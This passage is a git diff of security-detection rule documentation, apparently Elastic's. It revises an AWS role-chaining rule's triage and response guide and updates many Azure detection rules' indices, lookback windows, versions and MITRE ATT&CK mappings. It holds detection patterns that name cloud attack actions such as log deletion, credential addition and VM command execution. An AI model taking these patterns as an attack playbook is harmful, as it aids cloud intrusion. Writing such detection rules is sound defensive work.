ensure the rule is configured to only monitor role chaining within a single account, as specified in the rule description. -- Automated processes or applications that frequently assume roles for legitimate purposes may trigger false positives. Identify these processes and create exceptions for their specific access patterns or user identities. -- Scheduled tasks or scripts that use temporary credentials for routine operations might be flagged. Review these tasks and whitelist their access key IDs if they consistently follow a predictable and secure pattern. -- Development and testing environments often involve frequent role assumptions for testing purposes. Exclude these environments from monitoring or adjust the rule to account for their unique access behaviors. 
-- Regularly review and update the list of exceptions to ensure that only non-threatening behaviors are excluded, maintaining the effectiveness of the detection rule. +- **Expected role chaining.** Some organizations use role chaining as part of multi-account access strategies. Maintain an allowlist of known `issuer.arn` - `target.arn` pairs. +- **Automation and scheduled tasks.** CI/CD systems or monitoring tools may assume roles frequently. Validate by `userAgent` and historical behavior. +- **Test/dev environments.** Development accounts may generate experimental chaining patterns. Tune rules or exceptions to exclude low-risk accounts. *Response and remediation* -- Immediately revoke the temporary credentials associated with the detected AssumeRole activity to prevent further unauthorized access. -- Conduct a thorough review of the AWS CloudTrail logs to identify any additional suspicious activities or roles assumed using the compromised credentials. -- Isolate the affected AWS resources and accounts to prevent lateral movement and further privilege escalation within the environment. -- Notify the security team and relevant stakeholders about the incident for awareness and further investigation. -- Implement stricter IAM policies and role permissions to limit the ability to assume roles unnecessarily, reducing the risk of privilege escalation. -- Enhance monitoring and alerting for AssumeRole activities, especially those involving temporary credentials, to detect similar threats in the future. -- Conduct a post-incident review to identify gaps in security controls and update incident response plans to improve future response efforts. +**1. Immediate steps** +- **Preserve evidence.** Export triggering CloudTrail events (±30 minutes) into a restricted evidence bucket. Include session context, source IP, and user agent. +- **Notify owners.** Contact the owners of both roles to validate intent. + +**2. Containment (if suspicious)** +- **Revoke temporary credentials.** https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_revoke-sessions.html[Revoke Session Permissions] if possible, or attach https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AWSDenyAll.html[AWSDenyALL policy] to the originating role. +- **Restrict risky roles.** Apply least-privilege policies or temporarily deny `sts:AssumeRole` for suspicious principals. +- **Enable monitoring.** Ensure CloudTrail and GuardDuty are active in all regions to detect further chaining. + +**3. Scope and hunt** +- Search for additional AssumeRole activity by the same `issuer.arn` or `resources.arn` across other accounts and regions. +- Look for privilege escalation attempts (for example, IAM `AttachRolePolicy`, `UpdateAssumeRolePolicy`) or sensitive data access following the chain. + +**4. Recovery & hardening** +- Apply least privilege to all roles, limiting trust policies to only required principals. +- Enforce MFA where possible on AssumeRole operations. +- Periodically review role chaining patterns to validate necessity; remove unused or risky trust relationships. +- Document and tune new terms exceptions for known, legitimate chains. + + +*Additional information* + + +- https://github.com/aws-samples/aws-incident-response-playbooks/[AWS IR Playbooks]: NIST-aligned templates for evidence, containment, eradication, recovery, post-incident. 
+- https://github.com/aws-samples/aws-customer-playbook-framework/[AWS Customer Playbook Framework]: Practical response steps for account and IAM misuse scenarios +- AWS IAM Best Practices: https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html[AWS docs] for reducing risk from temporary credentials. ==== Setup @@ -103,13 +123,11 @@ The AWS Fleet integration, Filebeat module, or similarly structured data is requ [source, js] ---------------------------------- -from logs-aws.cloudtrail-* metadata _id, _version, _index - -// filter for AssumeRole API calls where access key id is a short term token beginning with ASIA -| where event.dataset == "aws.cloudtrail" and event.provider == "sts.amazonaws.com" and event.action == "AssumeRole" and aws.cloudtrail.resources.account_id == aws.cloudtrail.recipient_account_id and aws.cloudtrail.user_identity.access_key_id like "ASIA*" - -// keep only the relevant fields -| keep aws.cloudtrail.user_identity.arn, cloud.region, aws.cloudtrail.resources.account_id, aws.cloudtrail.recipient_account_id, aws.cloudtrail.user_identity.access_key_id + event.dataset : "aws.cloudtrail" and + event.provider : "sts.amazonaws.com" and + event.action : "AssumeRole" and + aws.cloudtrail.user_identity.type : "AssumedRole" and + event.outcome : "success" ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/azure-active-directory-high-risk-user-sign-in-heuristic.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-active-directory-high-risk-user-sign-in-heuristic.asciidoc index ebf0981d53..03d5453824 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-active-directory-high-risk-user-sign-in-heuristic.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-active-directory-high-risk-user-sign-in-heuristic.asciidoc @@ -7,8 +7,8 @@ Identifies high risk Azure Active Directory (AD) sign-ins by leveraging Microsof *Rule indices*: +* logs-azure.signinlogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Identifies high risk Azure Active Directory (AD) sign-ins by leveraging Microsof *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -35,7 +35,7 @@ Identifies high risk Azure Active Directory (AD) sign-ins by leveraging Microsof * Resources: Investigation Guide * Tactic: Initial Access -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -122,3 +122,7 @@ event.dataset:azure.signinlogs and ** Name: Valid Accounts ** ID: T1078 ** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-active-directory-powershell-sign-in.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-active-directory-powershell-sign-in.asciidoc index fb2a2b057c..c62ef42197 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-active-directory-powershell-sign-in.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-active-directory-powershell-sign-in.asciidoc @@ -7,8 +7,8 @@ Identifies a sign-in using the Azure Active Directory PowerShell module. 
PowerSh *Rule indices*: +* logs-azure.signinlogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies a sign-in using the Azure Active Directory PowerShell module. PowerSh *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -33,7 +33,7 @@ Identifies a sign-in using the Azure Active Directory PowerShell module. PowerSh * Resources: Investigation Guide * Tactic: Initial Access -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -124,3 +124,15 @@ event.dataset:azure.signinlogs and ** Name: Cloud Accounts ** ID: T1078.004 ** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-alert-suppression-rule-created-or-modified.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-alert-suppression-rule-created-or-modified.asciidoc index 8319aa28dd..7edae5acd5 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-alert-suppression-rule-created-or-modified.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-alert-suppression-rule-created-or-modified.asciidoc @@ -7,8 +7,8 @@ Identifies the creation of suppression rules in Azure. Suppression rules are a m *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies the creation of suppression rules in Azure. Suppression rules are a m *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -33,7 +33,7 @@ Identifies the creation of suppression rules in Azure. Suppression rules are a m * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/azure-application-credential-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-application-credential-modification.asciidoc index c9f02ba387..3697ad4058 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-application-credential-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-application-credential-modification.asciidoc @@ -7,8 +7,8 @@ Identifies when a new credential is added to an application in Azure. An applica *Rule indices*: +* logs-azure.auditlogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when a new credential is added to an application in Azure. An applica *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -29,10 +29,10 @@ Identifies when a new credential is added to an application in Azure. 
An applica * Domain: Cloud * Data Source: Azure * Use Case: Identity and Access Audit -* Tactic: Defense Evasion +* Tactic: Persistence * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -107,14 +107,14 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Update applica *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Defense Evasion -** ID: TA0005 -** Reference URL: https://attack.mitre.org/tactics/TA0005/ +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ * Technique: -** Name: Use Alternate Authentication Material -** ID: T1550 -** Reference URL: https://attack.mitre.org/techniques/T1550/ +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ * Sub-technique: -** Name: Application Access Token -** ID: T1550.001 -** Reference URL: https://attack.mitre.org/techniques/T1550/001/ +** Name: Additional Cloud Credentials +** ID: T1098.001 +** Reference URL: https://attack.mitre.org/techniques/T1098/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-automation-account-created.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-automation-account-created.asciidoc index 991cd60008..93b4f9f9fb 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-automation-account-created.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-automation-account-created.asciidoc @@ -7,8 +7,8 @@ Identifies when an Azure Automation account is created. Azure Automation account *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies when an Azure Automation account is created. Azure Automation account *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -35,7 +35,7 @@ Identifies when an Azure Automation account is created. Azure Automation account * Tactic: Persistence * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/azure-automation-runbook-created-or-modified.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-automation-runbook-created-or-modified.asciidoc index 09ca28658f..75af850b6a 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-automation-runbook-created-or-modified.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-automation-runbook-created-or-modified.asciidoc @@ -7,8 +7,8 @@ Identifies when an Azure Automation runbook is created or modified. An adversary *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies when an Azure Automation runbook is created or modified. An adversary *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,10 +32,10 @@ Identifies when an Azure Automation runbook is created or modified. 
An adversary * Domain: Cloud * Data Source: Azure * Use Case: Configuration Audit -* Tactic: Persistence +* Tactic: Execution * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -113,3 +113,14 @@ event.dataset:azure.activitylogs and event.outcome:(Success or success) ---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Serverless Execution +** ID: T1648 +** Reference URL: https://attack.mitre.org/techniques/T1648/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-automation-runbook-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-automation-runbook-deleted.asciidoc index 6464602ff7..d0e2346d79 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-automation-runbook-deleted.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-automation-runbook-deleted.asciidoc @@ -7,8 +7,8 @@ Identifies when an Azure Automation runbook is deleted. An adversary may delete *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies when an Azure Automation runbook is deleted. An adversary may delete *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -35,7 +35,7 @@ Identifies when an Azure Automation runbook is deleted. An adversary may delete * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/azure-automation-webhook-created.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-automation-webhook-created.asciidoc index 9bd7d47802..af56f67e2f 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-automation-webhook-created.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-automation-webhook-created.asciidoc @@ -7,8 +7,8 @@ Identifies when an Azure Automation webhook is created. Azure Automation runbook *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies when an Azure Automation webhook is created. Azure Automation runbook *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -35,7 +35,7 @@ Identifies when an Azure Automation webhook is created. 
Azure Automation runbook * Tactic: Persistence * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -111,3 +111,22 @@ event.dataset:azure.activitylogs and event.outcome:(Success or success) ---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Tactic: +** Name: Resource Development +** ID: TA0042 +** Reference URL: https://attack.mitre.org/tactics/TA0042/ +* Technique: +** Name: Stage Capabilities +** ID: T1608 +** Reference URL: https://attack.mitre.org/techniques/T1608/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-blob-container-access-level-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-blob-container-access-level-modification.asciidoc index 6af27ad6f8..873406caaa 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-blob-container-access-level-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-blob-container-access-level-modification.asciidoc @@ -7,8 +7,8 @@ Identifies changes to container access levels in Azure. Anonymous public read ac *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies changes to container access levels in Azure. Anonymous public read ac *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies changes to container access levels in Azure. 
Anonymous public read ac * Tactic: Discovery * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -110,14 +110,22 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF ** ID: TA0007 ** Reference URL: https://attack.mitre.org/tactics/TA0007/ * Technique: -** Name: Cloud Service Discovery -** ID: T1526 -** Reference URL: https://attack.mitre.org/techniques/T1526/ +** Name: Cloud Storage Object Discovery +** ID: T1619 +** Reference URL: https://attack.mitre.org/techniques/T1619/ * Tactic: -** Name: Initial Access -** ID: TA0001 -** Reference URL: https://attack.mitre.org/tactics/TA0001/ +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ * Technique: -** Name: Exploit Public-Facing Application -** ID: T1190 -** Reference URL: https://attack.mitre.org/techniques/T1190/ +** Name: File and Directory Permissions Modification +** ID: T1222 +** Reference URL: https://attack.mitre.org/techniques/T1222/ +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Transfer Data to Cloud Account +** ID: T1537 +** Reference URL: https://attack.mitre.org/techniques/T1537/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-blob-permissions-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-blob-permissions-modification.asciidoc index 3b4e5651d8..762150e6d7 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-blob-permissions-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-blob-permissions-modification.asciidoc @@ -7,8 +7,8 @@ Identifies when the Azure role-based access control (Azure RBAC) permissions are *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when the Azure role-based access control (Azure RBAC) permissions are *Runs every*: 5m -*Searches indices from*: None ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies when the Azure role-based access control (Azure RBAC) permissions are * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 107 +*Version*: 108 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/azure-command-execution-on-virtual-machine.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-command-execution-on-virtual-machine.asciidoc index 68dcd37b30..3050db28d9 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-command-execution-on-virtual-machine.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-command-execution-on-virtual-machine.asciidoc @@ -7,8 +7,8 @@ Identifies command execution on a virtual machine (VM) in Azure. A Virtual Machi *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Identifies command execution on a virtual machine (VM) in Azure. A Virtual Machi *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -34,7 +34,7 @@ Identifies command execution on a virtual machine (VM) in Azure. 
A Virtual Machi * Tactic: Execution * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -113,6 +113,6 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF ** ID: TA0002 ** Reference URL: https://attack.mitre.org/tactics/TA0002/ * Technique: -** Name: Command and Scripting Interpreter -** ID: T1059 -** Reference URL: https://attack.mitre.org/techniques/T1059/ +** Name: Cloud Administration Command +** ID: T1651 +** Reference URL: https://attack.mitre.org/techniques/T1651/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-diagnostic-settings-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-diagnostic-settings-deletion.asciidoc index 4730d63fa4..fadc8e3a1f 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-diagnostic-settings-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-diagnostic-settings-deletion.asciidoc @@ -7,8 +7,8 @@ Identifies the deletion of diagnostic settings in Azure, which send platform log *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Identifies the deletion of diagnostic settings in Azure, which send platform log *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -31,7 +31,7 @@ Identifies the deletion of diagnostic settings in Azure, which send platform log * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -117,3 +117,7 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF ** Name: Disable or Modify Tools ** ID: T1562.001 ** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Sub-technique: +** Name: Disable or Modify Cloud Logs +** ID: T1562.008 +** Reference URL: https://attack.mitre.org/techniques/T1562/008/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-entra-id-rare-app-id-for-principal-authentication.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-entra-id-rare-app-id-for-principal-authentication.asciidoc index a8a5a7e9cc..87cf1e1303 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-entra-id-rare-app-id-for-principal-authentication.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-entra-id-rare-app-id-for-principal-authentication.asciidoc @@ -8,7 +8,7 @@ Identifies rare Azure Entra ID apps IDs requesting authentication on-behalf-of a *Rule indices*: * filebeat-* -* logs-azure* +* logs-azure.signinlogs-* *Severity*: medium @@ -35,7 +35,7 @@ Identifies rare Azure Entra ID apps IDs requesting authentication on-behalf-of a * Tactic: Initial Access * Resources: Investigation Guide -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -124,6 +124,24 @@ event.dataset: "azure.signinlogs" and event.category: "authentication" and azure.signinlogs.properties.user_type: "Member" and not azure.signinlogs.properties.client_app_used: "Browser" and not source.as.organization.name: "MICROSOFT-CORP-MSN-AS-BLOCK" + and not azure.signinlogs.properties.app_id: ( + "1b3c667f-cde3-4090-b60b-3d2abd0117f0" or + "26a7ee05-5602-4d76-a7ba-eae8b7b67941" or + "4b0964e4-58f1-47f4-a552-e2e1fc56dcd7" or + "ecd6b820-32c2-49b6-98a6-444530e5a77a" or + "268761a2-03f3-40df-8a8b-c3db24145b6b" or + "fc0f3af4-6835-4174-b806-f7db311fd2f3" or + 
"de50c81f-5f80-4771-b66b-cebd28ccdfc1" or + "ab9b8c07-8f02-4f72-87fa-80105867a763" or + "6f7e0f60-9401-4f5b-98e2-cf15bd5fd5e3" or + "d7b530a4-7680-4c23-a8bf-c52c121d2e87" or + "52c2e0b5-c7b6-4d11-a89c-21e42bcec444" or + "38aa3b87-a06d-4817-b275-7a316988d93b" or + "27922004-5251-4030-b22d-91ecd9a37ea4" or + "9ba1a5c7-f17a-4de9-a1f1-6178c8d51223" or + "cab96880-db5b-4e15-90a7-f3f1d62ffe39" or + "3a4d129e-7f50-4e0d-a7fd-033add0a29f4" + ) ---------------------------------- @@ -141,3 +159,11 @@ event.dataset: "azure.signinlogs" and event.category: "authentication" ** Name: Cloud Accounts ** ID: T1078.004 ** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-event-hub-authorization-rule-created-or-updated.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-event-hub-authorization-rule-created-or-updated.asciidoc index 0d49d99b5b..bedf2f64ec 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-event-hub-authorization-rule-created-or-updated.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-event-hub-authorization-rule-created-or-updated.asciidoc @@ -7,8 +7,8 @@ Identifies when an Event Hub Authorization Rule is created or updated in Azure. *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when an Event Hub Authorization Rule is created or updated in Azure. *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -29,10 +29,10 @@ Identifies when an Event Hub Authorization Rule is created or updated in Azure. 
* Domain: Cloud * Data Source: Azure * Use Case: Log Auditing -* Tactic: Collection +* Tactic: Persistence * Resources: Investigation Guide -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -106,18 +106,22 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Collection -** ID: TA0009 -** Reference URL: https://attack.mitre.org/tactics/TA0009/ +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ * Technique: -** Name: Data from Cloud Storage -** ID: T1530 -** Reference URL: https://attack.mitre.org/techniques/T1530/ +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ * Tactic: -** Name: Exfiltration -** ID: TA0010 -** Reference URL: https://attack.mitre.org/tactics/TA0010/ +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ * Technique: -** Name: Transfer Data to Cloud Account -** ID: T1537 -** Reference URL: https://attack.mitre.org/techniques/T1537/ +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Cloud Instance Metadata API +** ID: T1552.005 +** Reference URL: https://attack.mitre.org/techniques/T1552/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-event-hub-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-event-hub-deletion.asciidoc index 14cc99dbed..56dc19eef1 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-event-hub-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-event-hub-deletion.asciidoc @@ -7,8 +7,8 @@ Identifies an Event Hub deletion in Azure. An Event Hub is an event processing s *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Identifies an Event Hub deletion in Azure. An Event Hub is an event processing s *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -34,7 +34,7 @@ Identifies an Event Hub deletion in Azure. An Event Hub is an event processing s * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -117,6 +117,6 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF ** ID: T1562 ** Reference URL: https://attack.mitre.org/techniques/T1562/ * Sub-technique: -** Name: Disable or Modify Tools -** ID: T1562.001 -** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +** Name: Disable or Modify Cloud Logs +** ID: T1562.008 +** Reference URL: https://attack.mitre.org/techniques/T1562/008/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-external-guest-user-invitation.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-external-guest-user-invitation.asciidoc index 37087b5e8f..87efba1daa 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-external-guest-user-invitation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-external-guest-user-invitation.asciidoc @@ -7,8 +7,8 @@ Identifies an invitation to an external user in Azure Active Directory (AD). 
Azu *Rule indices*: +* logs-azure.auditlogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies an invitation to an external user in Azure Active Directory (AD). Azu *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies an invitation to an external user in Azure Active Directory (AD). Azu * Tactic: Initial Access * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/azure-firewall-policy-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-firewall-policy-deletion.asciidoc index d785670cea..b309e3d360 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-firewall-policy-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-firewall-policy-deletion.asciidoc @@ -7,8 +7,8 @@ Identifies the deletion of a firewall policy in Azure. An adversary may delete a *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies the deletion of a firewall policy in Azure. An adversary may delete a *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies the deletion of a firewall policy in Azure. An adversary may delete a * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -115,6 +115,6 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF ** ID: T1562 ** Reference URL: https://attack.mitre.org/techniques/T1562/ * Sub-technique: -** 